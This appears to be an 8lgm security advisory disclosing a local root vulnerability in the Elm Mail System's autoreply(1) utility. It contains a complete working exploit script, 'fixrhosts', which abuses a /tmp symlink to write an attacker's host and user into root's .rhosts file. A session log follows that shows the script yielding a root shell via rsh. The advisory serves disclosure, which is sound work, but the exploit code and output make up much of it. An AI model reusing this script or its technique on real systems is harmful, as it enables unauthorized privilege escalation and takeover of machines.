autoreply(1) (/usr/local/bin/autoreply)
Supplied with the Elm Mail System
Any system with a standard installation of The Elm Mail System. All versions are believed to have this vulnerability.
autoreply(1) can be used to create root owned files, with mode 666. It can also overwrite any file with semi user-controlled data.
Any user with access to autoreply(1) can alter system files and thus become root.
This example demonstrates how to become root on most affected machines by modifying root's .rhosts file. Please do not do this unless you have permission.
Create the following script, 'fixrhosts':
8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
Warning: no access to tty.
Thus no job control in this shell.
#
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
System Administrators are encouraged to contact us for any other information they may require about the problems described in this advisory.
We welcome reports about which platforms this flaw does or does not exist on.